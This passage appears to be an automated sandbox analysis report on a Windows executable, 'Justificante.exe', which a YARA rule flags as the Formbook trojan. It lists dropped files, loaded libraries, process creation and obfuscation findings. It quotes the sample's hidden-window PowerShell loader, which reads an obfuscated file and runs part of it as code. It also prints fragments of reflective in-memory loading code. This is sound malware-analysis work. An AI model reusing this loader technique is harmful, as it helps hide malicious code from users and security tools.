      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FF43F7_2_223FF43F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223314607_2_22331460
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F75717_2_223F7571
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DD5B07_2_223DD5B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B3A6C7_2_223B3A6C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FFA497_2_223FFA49
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F7A467_2_223F7A46
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DDAAC7_2_223DDAAC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22385AA07_2_22385AA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E1AA37_2_223E1AA3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EDAC67_2_223EDAC6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FFB767_2_223FFB76
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235FB807_2_2235FB80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B5BF07_2_223B5BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237DBF97_2_2237DBF9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AD8007_2_223AD800
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223438E07_2_223438E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D59107_2_223D5910
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223499507_2_22349950
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235B9507_2_2235B950
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22349EB07_2_22349EB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FFF097_2_223FFF09
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FFFB17_2_223FFFB1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22341F927_2_22341F92
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B9C327_2_223B9C32
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FFCF27_2_223FFCF2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F7D737_2_223F7D73
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F1D5A7_2_223F1D5A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22343D407_2_22343D40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235FDC07_2_2235FDC0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: String function: 22375130 appears 58 times
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: String function: 22387E54 appears 101 times
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: String function: 2232B970 appears 280 times
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: String function: 223AEA12 appears 82 times
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: String function: 223BF290 appears 103 times
      Source: Justificante.exeStatic PE information: invalid certificate
      Source: Justificante.exe, 00000000.00000000.1417781812.0000000000460000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebramstngers.exeP vs Justificante.exe
      Source: Justificante.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/18@2/2
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
      Source: C:\Users\user\Desktop\Justificante.exeFile created: C:\Users\user\AppData\Local\unavailabilityJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
      Source: C:\Users\user\Desktop\Justificante.exeFile created: C:\Users\user\AppData\Local\Temp\nsr6B39.tmpJump to behavior
      Source: Justificante.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\Justificante.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Justificante.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\Desktop\Justificante.exeFile read: C:\Users\user\Desktop\Justificante.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Justificante.exe "C:\Users\user\Desktop\Justificante.exe"
      Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Apathism.exe "C:\Users\user\AppData\Local\Temp\Apathism.exe"
      Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Apathism.exe "C:\Users\user\AppData\Local\Temp\Apathism.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: fontext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: fms.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Justificante.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147024134.0000000006D2D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb? source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: Binary string: wntdll.pdb source: Apathism.exe
      Source: Binary string: System.Core.pdb" source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Finners $Carvings100 $variabelforklaringerne), (Logistical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:preadamic = [AppDomain]::CurrentDomain.GetAssemb
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Omtydedes)), $Upholders).DefineDynamicModule($Parvirostrate108, $false).DefineType($Cav, $finnack, [System.MulticastDelegate])$Unpacka
      Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
      Source: C:\Users\user\Desktop\Justificante.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223309AD push ecx; mov dword ptr [esp], ecx7_2_223309B6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Apathism.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
